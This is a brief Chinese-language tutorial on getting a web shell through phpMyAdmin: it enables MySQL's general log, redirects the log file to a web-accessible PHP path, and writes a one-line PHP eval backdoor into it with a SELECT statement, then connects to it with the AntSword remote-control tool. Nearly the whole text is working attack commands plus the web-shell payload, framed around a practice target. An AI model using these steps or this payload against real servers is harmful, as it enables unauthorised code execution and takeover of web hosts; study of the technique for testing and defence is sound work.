phpmyadmin 日志getshell

前提:拥有开启日志或修改日志的权限

查看日志是否开启

1
show variables like ‘general%’;

image-20231128001425463

开启日志

1
set global general_log = on;

image-20230812144205330

修改日志的路径到一个外部可访问的路径

1
set global general_log_file = '	C:/phpStudy/WWW/rizhi.php';

利用phpmyadmin日志的漏洞,写入一句话木马

1
select '<?php eval($_POST[1]); ?>';

此时木马已经被记录在日志里了

靶机视角:

image-20230812151901263

利用远控工具链接一句话木马(蚁剑)

image-20230812154346115

image-20230812154426380

image-20230812155151866